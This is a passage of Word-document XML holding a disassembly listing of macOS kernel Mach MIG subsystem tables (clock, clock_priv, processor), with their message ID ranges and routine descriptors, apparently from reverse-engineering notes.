      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq offset _Xclock_get_time; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 2                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 34h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 3984D000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E02CD0                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 db 34h, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 34h                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 3986C0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dq 6                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRDefault="00ED4A5C" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>clock_priv_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68 ; const clock_priv_subsystem clock_priv_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68 clock_priv_subsystem_0 dq offset clock_priv_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                                         ; DATA XREF: clock_priv_server_routine:loc_FFFFFF8000398AC2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                                         ; clock_priv_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02D68                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4B0h</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02D68                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4B2h</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 2Ch                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dq offset _Xclock_set_time; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 3                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E02D68                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dq 398C5000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02D68                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02DD8                 public catch_exc_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRDefault="00ED4A5C" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>processor_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 public processor_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848 ; const processor_subsystem processor_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848 processor_subsystem_0 dq offset processor_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                                         ; DATA XREF: processor_server_routine:loc_FFFFFF80003B8AF2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                                         ; processor_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04848                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0BB8h</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04848                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0BBEh</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 70h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
